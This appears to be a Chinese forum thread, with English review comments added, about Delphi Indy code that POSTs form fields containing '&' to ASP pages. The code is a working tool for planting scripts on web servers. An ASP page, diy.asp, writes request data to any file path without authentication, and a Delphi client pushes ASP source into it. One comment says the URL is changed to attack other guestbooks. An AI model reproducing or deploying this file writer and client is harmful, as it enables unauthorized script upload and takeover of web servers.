试了很多方法都不行,下面的代码把&以后的内容自动截掉了
// Body of a handler whose procedure header is not part of the post: it builds a
// two-field form and POSTs it through a locally created TIdHTTP instance.
var
// NOTE(review): str is declared but never used in this fragment.
str:string;
IdHTTP: TIDHttp;
myParams:tStringList; // variable declarations
ret:TStringStream;
begin
IdHTTP := TIDHttp.Create(nil);
IdHTTP.ReadTimeout := 30*1000;
// NOTE(review): the next two lines configure IdHTTP1, not the local IdHTTP created
// above. IdHTTP1 is not declared in this fragment (presumably a component on the
// form), and the request below is sent through IdHTTP, so these settings are not
// applied to the object that performs the POST.
IdHTTP1.Request.ContentType :='application/x-www-form-urlencoded';
IdHTTP1.HTTPOptions:=[hoForceEncodeParams];
// ret receives the response body; it is never read and never freed in this fragment.
ret:=tstringstream.Create('');
myParams:=tStringList.Create;
myParams.Add('1path='+'d:\www\1.asp');
// Earlier attempts at encoding the memo text by hand, left commented out by the author.
//myParams.Add('cyfddata='+StringReplace(memo2.Text, '&', '%26', [rfReplaceAll]));
//myParams.Add('cyfddata='+TIdURI.URLEncode(memo2.Text));
//showmessage(TIdURI.URLEncode(memo2.Text));
// The memo text is appended to the field as-is; how '&' inside it is encoded is left
// to TIdHTTP's parameter handling, which is not visible here.
myParams.Add('data='+memo2.Text); try
IdHTTP.Post('http://tt/xx.asp',myParams,ret); // IdHTTP submits the POST request; the author notes the submit URL has to be changed to attack a different guestbook
//showmessage(ret.DataString); // returns the page source
//showmessage(idHttp.responsetext); // returns the status text: http 202 ok...
//showmessage(inttostr(idHttp.responsecode)); // returns the status code: 202
except
// NOTE(review): this branch runs only when Post raises. The exception is discarded
// and a fixed line is appended to Memo2, so a failed request is recorded exactly
// like the "sent" case the trailing comment describes.
Memo2.Lines.Add('估计是成功了'); // record that sending has finished
end;
IdHTTP.Disconnect;
FreeAndNil(IdHTTP);
FreeAndNil(myParams);
end;
// Second copy of the same handler body (its procedure header is not shown): builds a
// two-field form and POSTs it through a locally created TIdHTTP instance.
var
// NOTE(review): str is declared but never used in this fragment.
str:string;
IdHTTP: TIDHttp;
myParams:tStringList; // variable declarations
ret:TStringStream;
begin
IdHTTP := TIDHttp.Create(nil);
IdHTTP.ReadTimeout := 30*1000;
// NOTE(review): these two lines set properties on IdHTTP1, which is not the local
// IdHTTP used for the request and is not declared in this fragment; the content
// type and option set chosen here therefore do not reach the POST below.
IdHTTP1.Request.ContentType :='application/x-www-form-urlencoded';
IdHTTP1.HTTPOptions:=[hoForceEncodeParams];
// Response stream: created here, never read, never freed in this fragment.
ret:=tstringstream.Create('');
myParams:=tStringList.Create;
myParams.Add('1path='+'d:\www\1.asp');
// Commented-out manual encoding attempts kept by the author.
//myParams.Add('cyfddata='+StringReplace(memo2.Text, '&', '%26', [rfReplaceAll]));
//myParams.Add('cyfddata='+TIdURI.URLEncode(memo2.Text));
//showmessage(TIdURI.URLEncode(memo2.Text));
// Raw memo text becomes the value of the "data" field.
myParams.Add('data='+memo2.Text); try
IdHTTP.Post('http://tt/xx.asp',myParams,ret); // IdHTTP submits the POST request; the author notes the submit URL has to be changed to attack a different guestbook
//showmessage(ret.DataString); // returns the page source
//showmessage(idHttp.responsetext); // returns the status text: http 202 ok...
//showmessage(inttostr(idHttp.responsecode)); // returns the status code: 202
except
// NOTE(review): reached only when Post raises; the exception object is dropped and
// the memo gets the same fixed line regardless of what went wrong.
Memo2.Lines.Add('估计是成功了'); // record that sending has finished
end;
IdHTTP.Disconnect;
FreeAndNil(IdHTTP);
FreeAndNil(myParams);
end;
memo2.text := StringReplace(memo2.Text, '&', '&', [rfReplaceAll]));
改成你这句还是一样效果阿,&之后的字符被截去
<% Response.Write "<input type=text name=syfdpath value="&server.mappath("abc.asp")&" size=60>" %>
至于unicode的加解码网上很多DELPHI源码。
<% Response.Write "<input type=text name=syfdpath value="%26server.mappath("abc.asp")%26" size=60>" %>
再者你的书写方式有误,字符串边界符搭配不当。正确写法应该是:
<% Response.Write "<input type=text name=syfdpath value=""&" & server.mappath("abc.asp")& "&"" size=60>" %>
<% Response.Write "<input type=text name=syfdpath value='&" & server.mappath("abc.asp")& "&' size=60>" %>
是啊,但是服务器端没有把%26还原成&的阿。
边界匹配时,value=123和value="123" 都是正确的。
<% Response.Write "<input type=text name=syfdpath value="%26server.mappath
^
("abc.asp")%26" size=60>" %>
^ ^ ^
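// Posts two form fields to the local test page and loads the reply into Memo1.
// The field values are written already percent-encoded (%26 stands for '&') and
// HTTPOptions is emptied so that hoForceEncodeParams is not set; the test page in
// this thread echoed them back as "I&You!You&Me!".
// All three helper objects are released in a finally block, so an exception raised
// by Post (timeout, refused connection, HTTP error) no longer leaks them. The
// exception itself still propagates to the caller as before.
procedure TForm1.Button1Click(Sender: TObject);
var
  IdHTTP: TIDHttp;
  Params: TStringList;
  Ret: TStringStream;
begin
  // Start from nil so the finally block is safe even if a constructor raises.
  IdHTTP := nil;
  Params := nil;
  Ret := nil;
  try
    IdHTTP := TIDHttp.Create(nil);
    IdHTTP.ReadTimeout := 30*1000;
    IdHTTP.Host := '127.0.0.1';
    IdHTTP.Request.ContentType := 'application/x-www-form-urlencoded';
    // Empty option set: the values below are sent as written.
    IdHTTP.HTTPOptions := [];

    Params := TStringList.Create;
    Params.Add('msg1=I%26You!');
    Params.Add('msg2=You%26Me!');

    Ret := TStringStream.Create('');
    IdHTTP.Post('http://127.0.0.1/test.asp', Params, Ret);

    // Rewind before reading: Post leaves the stream positioned at its end.
    Ret.Position := 0;
    Memo1.Lines.LoadFromStream(Ret);
  finally
    if Assigned(IdHTTP) then
      IdHTTP.Disconnect;
    FreeAndNil(IdHTTP);
    FreeAndNil(Params);
    FreeAndNil(Ret);
  end;
end;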
//以下是我的Asp测试代码
<%
Response.Write(Request("msg1"))
Response.Write(Request("msg2"))
%>
//以下是我测试结果
I&You!You&Me!
// Body of a routine whose header is not part of the post; the call further down
// suggests it is makediy with one string argument, which would be the undeclared
// identifier a used below (assumption, the header is not shown).
var
IdHTTP: TIDHttp;
myParams:tStringList;
ret:TStringStream;
begin
IdHTTP := TIDHttp.Create(nil);
IdHTTP.ReadTimeout := 30*1000;
// HTTPOptions and ContentType are not set in this variant, so the component's
// defaults apply (the earlier working sample in this thread set HTTPOptions to []).
// NOTE(review): ret is created here and never freed.
ret:=tstringstream.Create('');
myParams:=tStringList.Create;
// Field a comes from the caller, field b from the memo on Form1; both are added as-is.
myParams.Add('a='+a);
myParams.Add('b='+form1.memo2.Text);
try
IdHTTP.Post('http://127.0.0.1/ab.asp',myParams,ret);
showmessage(ret.DataString); finally
// Cleanup runs whether or not Post raised; an exception still propagates.
IdHTTP.Disconnect;
FreeAndNil(IdHTTP);
FreeAndNil(myParams);
end;
// The click handler that follows passes a value in which '&' is already written as %26.
end;procedure TForm1.Button1Click(Sender: TObject);
begin
makediy('a%26b');
end;// below is my memo2.Text
c%26d//以下是我的Asp测试代码
<%
<%Response.Write(Request("a"))%>
<%Response.Write(Request("b"))%>
%>
//以下是我测试结果
a%26bc%26d
改为
Ret.Position:=0;
form1.Memo1.Lines.LoadFromStream(ret);结果还是a%26bc%26d
我也是跟我大哥学的,呵呵!!
TStringStream.Create('我需要发送的东西');
然后就搞定了,希望对你有帮助。
// Complete test unit posted in the thread: one form with a button whose click handler
// calls makediy. Several line breaks were lost when the post was pasted, so keywords
// run together on some lines; the text is kept exactly as posted.
unit Unit1;interfaceuses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, IdHTTP;type
TForm1 = class(TForm)
Button1: TButton;
Memo2: TMemo;
procedure Button1Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;var
// makediy(url, abspath): POSTs two form fields to url and returns the response body.
//   syfdpath = abspath, passed through unchanged
//   cyfddata = a hard-coded string holding a line of ASP source, including raw '&'
// Result is '' until Post returns; if Post raises, the exception propagates after
// the finally block has run.
Form1: TForm1;implementation{$R *.dfm}function makediy(url: string; abspath: string):string;
var
IdHTTP: TIDHttp;
myParams:tStringList;
ret:TStringStream;
begin
Result:= '';
IdHTTP := TIDHttp.Create(nil);
IdHTTP.ReadTimeout := 30*1000;
// Content type and option set are commented out, so the component defaults apply.
//IdHTTP.Request.ContentType :='application/x-www-form-urlencoded';
//IdHTTP1.HTTPOptions:=[hoForceEncodeParams];
// NOTE(review): ret is never freed in this function.
ret:=tstringstream.Create('');
myParams:=tStringList.Create;
myParams.Add('syfdpath='+abspath);
//myParams.Add('cyfddata='+StringReplace(memo2.Text, '&', #38, [rfReplaceAll]));
//myParams.Add('cyfddata='+TIdURI.URLEncode(memo2.Text));
// The value below is server-side script text, not plain data. With the receiving page
// listed in this thread, whatever arrives in cyfddata is written to the path given in
// syfdpath, so this request asks the server to create a script file on its own disk.
myParams.Add('cyfddata='+'<% Response.Write "<input type=text name=syfdpath value=""&" & server.mappath("abc.asp")& "&"" size=60>" %>');
try
IdHTTP.Post(url,myParams,ret);
Result:= ret.DataString;
//showmessage(ret.DataString); // returns the page source
//showmessage(idHttp.responsetext); // returns the status text: http 202 ok...
//showmessage(inttostr(idHttp.responsecode)); // returns the status code: 202
finally
IdHTTP.Disconnect;
FreeAndNil(IdHTTP);
FreeAndNil(myParams);
end;
// Click handler: calls makediy against the local test server with a destination path
// under d:\www and discards the returned string.
end;procedure TForm1.Button1Click(Sender: TObject);
begin
makediy('http://127.0.0.1/diy.asp','d:\www\test.asp');
end;end.
http://127.0.0.1/diy.asp的源码:
本文件绝对的路径D:\www\diy.asp
<% ' diy.asp: when the request carries a non-empty syfdpath, creates or overwrites the file at that path and writes the request's cyfddata into it; then renders a form with the same two fields. %>
<% ' NOTE(review): syfdpath reaches CreateTextFile unchanged and cyfddata is written unchanged. No authentication, path restriction or content check appears in this listing, so any client that can reach the page can create or overwrite any file the web process may write, including script files under the site root. A page of this shape found on a server should be treated as something to investigate and removed, not patched. %>
<% ' NOTE(review): both fields are read with Request("name") rather than Request.Form, which also matches query-string values, so when reviewing access logs look for syfdpath= and cyfddata= in request URLs as well as in POST bodies. %>
<% dim objFSO,fdata,objCountFile %>
<% ' From here on runtime errors are suppressed instead of stopping the page. %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))<>"" then %>
<% fdata = request("cyfddata") %>
<% ' Second argument True: an existing file at that path is overwritten. %>
<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% ' The success text is printed only when no error was recorded; a failure prints nothing. %>
<% if err =0 then response.write "<font color=red>save Success!</font>" %>
<% err.clear %>
<% end if %>
<% ' Close sits outside the If block, so it also runs when no file was opened; the error that causes is hidden by On Error Resume Next. %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<form method=post>
<% ' The path box is pre-filled with the mapped path of ttdiy.asp; the value attribute is unquoted, so a path containing a space would be cut at the space. %>
<input type=text name=syfdpath value=<%=server.mappath("ttdiy.asp")%> size=60>
<textarea name=cyfddata cols=80 rows=10 width=32></textarea>
<input type=submit value="">
</form>
运行结果:产生的test.asp内容在&字符前面被截断:
<% Response.Write "<input type=text name=syfdpath value=""
这句中用%26替代&符号 结果也不对(&显示为%26)